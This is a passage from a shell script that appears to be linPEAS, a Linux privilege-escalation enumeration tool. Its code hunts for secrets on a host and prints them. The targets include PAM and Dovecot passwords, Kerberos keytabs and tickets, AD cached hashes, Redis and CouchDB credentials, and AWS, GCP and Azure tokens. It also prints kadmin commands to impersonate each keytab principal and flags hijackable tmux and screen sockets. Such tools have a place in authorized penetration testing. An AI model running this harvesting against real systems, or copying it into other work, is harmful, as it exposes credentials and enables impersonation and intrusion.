print_3title "Listing gpg keys cached in gpg-agent" gpg-connect-agent "keyinfo
--list" /bye echo "" fi if [ "$writable_agents" ]; then print_3title "Writable
ssh and gpg agents" printf "%s\n" "$writable_agents" fi if [
"$PSTORAGE_SSH_CONFIG" ]; then print_3title "Some home ssh config file was
found" printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed
-${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" |
sed -${E} "s,User|ProxyCommand,${SED_RED},"; done echo "" fi if [ "$hostsdenied"
]; then print_3title "/etc/hosts.denied file found, read the rules:" printf
"$hostsdenied\n" cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#"
| grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow"
]; then print_3title "/etc/hosts.allow file found, trying to read the rules:"
printf "$hostsallow\n" cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep
-v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" fi if [
"$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for
interesting info" grep -v "^#" ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null |
grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E}
"s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" if [
"$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing PAM Auth
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s"
"$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while
read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null
| grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E}
"s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";done; echo ""; fi
#-- SI) Passwords inside pam.d pamdpass=$(grep -Ri "passwd"
${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#") if [ "$pamdpass" ] || [
"$DEBUG" ]; then print_2title "Passwords inside pam.d" grep -Ri "passwd"
${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
echo "" fi if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then print_2title
"Analyzing NFS Exports Files (limit 70)" nfsmounts=`cat /proc/mounts 2>/dev/null
| grep nfs`; if [ "$nfsmounts" ]; then echo -e "Connected NFS Mounts:
\n$nfsmounts"; fi if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E
\"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi;
printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null
| grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,insecure|rw|nohide,${SED_RED},g" | sed -${E}
"s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; fi #-- SI)
Kerberos kadmin_exists="$(command -v kadmin)" klist_exists="$(command -v klist)"
kinit_exists="$(command -v kinit)" if [ "$kadmin_exists" ] || [ "$klist_exists"
] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
print_2title "Searching kerberos conf files and tickets" print_info
"http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory"
if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed
"s,$kadmin_exists,${SED_RED},"; fi if [ "$kinit_exists" ]; then echo "kadmin was
found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi if [
"$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist;
fi ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [
"$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is
disabled (0), you might find tickets inside processes memory" | sed "s,is
disabled,${SED_RED},g"; else echo "ptrace protection is enabled ($ptrace_scope),
you need to disable it to search for tickets inside processes memory" | sed
"s,is enabled,${SED_GREEN},g"; fi (env || printenv) 2>/dev/null | grep -E
"^KRB5" | sed -${E} "s,KRB5,${SED_RED},g" printf "%s\n" "$PSTORAGE_KERBEROS" |
while read f; do if [ -r "$f" ]; then if echo "$f" | grep -q .k5login; then echo
".k5login file (users with access to the user who has this file in his home)"
cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" elif echo "$f" | grep -q
keytab; then echo "" echo "keytab file found, you may be able to impersonate
some kerberos principals and add users or modify passwords" klist -k "$f"
2>/dev/null | sed -${E} "s,.*,${SED_RED},g" printf "$(klist -k $f
2>/dev/null)\n" | awk '{print $2}' | while read l; do if [ "$l" ] && echo "$l" |
grep -q "@"; then printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t
/etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" # kadmin -k -t
/etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the
permissions of each impersoanted user, the thing is that in a test it showed
that every user had the same permissions (even if they didn't). So this test
isn't valid # We could also try to create a new user or modify a password, but
I'm not user if linpeas should do that fi done elif echo "$f" | grep -q
krb5.conf; then ls -l "$f" cat "$f" 2>/dev/null | sed -${E}
"s,default_ccache_name,${SED_RED},"; elif echo "$f" | grep -q kadm5.acl; then ls
-l "$f" cat "$f" 2>/dev/null elif echo "$f" | grep -q sssd.conf; then ls -l "$f"
cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?=
?[tT][rR][uU][eE],${SED_RED},"; elif echo "$f" | grep -q secrets.ldb; then echo
"You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E}
"s,SSSDKCMExtractor,${SED_RED},"; ls -l "$f" elif echo "$f" | grep -q
.secrets.mkey; then echo "This is the secrets file to use with SSSDKCMExtractor"
| sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; ls -l "$f" fi fi done ls -l
"/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab"
2>/dev/null || echo_not_found "tickets kerberos" klist 2>/dev/null ||
echo_not_found "klist" echo "" fi if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ];
then print_2title "Analyzing FreeIPA Files (limit 70)" ipa_exists="$(command -v
ipa)"; if [ "$ipa_exists" ]; then print_info
"https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting"; fi if ! [
"`echo \"$PSTORAGE_FREEIPA\" | grep -E \"ipa$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "ipa"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "ipa$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipa$,${SED_RED},"; find
"$f" -name "default.conf" | while read ff; do ls -ld "$ff" | sed -${E}
"s,default.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo
"";done; echo ""; if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"dirsrv$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "dirsrv"; fi; fi; printf "%s"
"$PSTORAGE_FREEIPA" | grep -E "dirsrv$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,dirsrv$,${SED_RED},"; find "$f" -name "id2rntry.db" |
while read ff; do ls -ld "$ff" | sed -${E} "s,id2rntry.db,${SED_RED},"; done;
echo "";done; echo ""; fi if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E
"knockd.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Kibana Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E
\"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml";
fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read
f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed
-${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo
""; fi if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET
'127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" if ! [ "`echo
\"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s"
"$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do
ls -ld "$f" 2>/dev/null | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | grep -E
"path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts"
| grep -Ev "\W+\#|^#"; done; echo ""; fi ##-- SI) Logstash if [
"$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then print_2title "Searching logstash
files" printf "$PSTORAGE_LOGSTASH" printf "%s\n" "$PSTORAGE_LOGSTASH" | while
read d; do if [ -r "$d/startup.options" ]; then echo "Logstash is running as
user:" cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed
-${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," |
sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E}
"s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," fi cat
"$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E}
"s,exec\W*\{|command\W*=>,${SED_RED}," cat "$d/conf.d/filt*" | grep
"path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E}
"s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," done fi echo "" #-- SI) Vault-ssh
if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then print_2title
"Searching Vault-ssh files" printf "$PSTORAGE_VAULT_SSH_HELPER\n" printf "%s\n"
"$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null;
vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" vault
secrets list 2>/dev/null printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E}
"s,.*,${SED_RED}," 2>/dev/null fi echo "" #-- SI) Cached AD Hashes adhashes=$(ls
"/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb"
"/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*"
2>/dev/null) if [ "$adhashes" ] || [ "$DEBUG" ]; then print_2title "Searching AD
cached hashes" ls -l "/var/lib/samba/private/secrets.tdb"
"/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb"
"/var/lib/sss/db/cache_*" 2>/dev/null echo "" fi #-- SI) Screen sessions if ([
"$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]) && ! [
"$SEARCH_IN_FOLDER" ]; then print_2title "Searching screen sessions" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions"
screensess=$(screen -ls 2>/dev/null) screensess2=$(find /run/screen -type d
-path "/run/screen/S-*" 2>/dev/null) screen -v printf
"$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No
Sockets found.*,${C}[32m&${C}[0m," find /run/screen -type s -path
"/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w
-and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do echo "Other user
screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," done echo "" fi
#-- SI) Tmux sessions tmuxdefsess=$(tmux ls 2>/dev/null) tmuxnondefsess=$(ps
auxwww | grep "tmux " | grep -v grep) tmuxsess2=$(find /tmp -type d -path
"/tmp/tmux-*" 2>/dev/null) if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [
"$tmuxsess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then print_2title
"Searching tmux sessions"$N print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions"
tmux -V printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E}
"s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," find
/tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '('
-perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do echo
"Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," done
echo "" fi if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then print_2title
"Analyzing CouchDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep
-E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi;
fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name
"local.ini" | while read ff; do ls -ld "$ff" | sed -${E}
"s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev
"^;" | sed -${E}
"s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Redis Files (limit 70)" ( redis-server --version ||
echo_not_found "redis-server") 2>/dev/null if [ "`redis-cli INFO 2>/dev/null`" ]
&& ! [ "`redis-cli INFO 2>/dev/null | grep -i NOAUTH`" ]; then echo "Redis isn't
password protected" | sed -${E} "s,.*,${SED_RED},"; fi if ! [ "`echo
\"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E
"redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev
"\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo
""; fi #-- SI) Dovecot # Needs testing dovecotpass=$(grep -r "PLAIN"
/etc/dovecot 2>/dev/null) if [ "$dovecotpass" ] || [ "$DEBUG" ]; then
print_2title "Searching dovecot files" if [ -z "$dovecotpass" ]; then
echo_not_found "dovecot credentials" else printf "%s\n" "$dovecotpass" | while
read d; do df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo
"Found possible PLAIN text creds in $df" echo "$dp" | sed -${E}
"s,.*,${SED_RED}," 2>/dev/null done fi echo "" fi if [ "$PSTORAGE_MOSQUITTO" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Mosquitto Files (limit 70)" if ! [
"`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s"
"$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done;
echo ""; fi if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Neo4j Files (limit 70)" if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E
\"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi;
printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while
read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null
| grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
fi AWSVAULT="$(command -v aws-vault 2>/dev/null)" if [ "$AWSVAULT" ] || [
"$DEBUG" ]; then print_2title "Check aws-vault" aws-vault list fi if [
"$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Cloud Credentials Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if
! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" |
grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null |
sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"adc\.json$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "adc.json"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "adc\.json$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,adc\.json$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" |
grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.credentials\.json$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found ".credentials.json"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.credentials\.json$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.credentials\.json$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"firebase-tools\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"firebase-tools.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep
-E "firebase-tools\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,firebase-tools\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv
"^$" | sed -${E} "s,id_token.*|access_token.*|refresh_token.*,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E
"access_tokens\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E
"accessTokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"gcloud$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "gcloud"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS"
| grep -E "gcloud$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,gcloud$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" |
sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E
"b'authorization'.*" | sed -${E} "s,b'authorization'.*,${SED_RED},g"; done; echo
"";done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"legacy_credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"legacy_credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep
-E "legacy_credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,legacy_credentials$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls
-ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"
| sed -${E} "s,refresh_token.*|client_secret,${SED_RED},g"; done; echo "";done;
echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E
\"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E
"azureProfile\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if
! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi;
printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" |
sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"ErrorRecords$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "ErrorRecords"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "ErrorRecords$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,ErrorRecords$,${SED_RED},"; done; echo "";
if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf
"%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s"
"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name
"config.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,.*,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo
\"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"doctl$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "doctl"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" |
grep -E "doctl$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,doctl$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld
"$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | grep -E "access-token.*" | sed -${E} "s,access-token.*,${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ];
then print_2title "Analyzing Cloud Init Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" |
grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE
KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed
-${E}
"s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE
KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo "";
fi if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then print_2title "Analyzing
CloudFlare Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E
\"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E
"\.cloudflared$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; fi if [
"$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then print_2title "Analyzing Erlang Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf
"%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi
if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing GMV
Auth Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E
\"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E
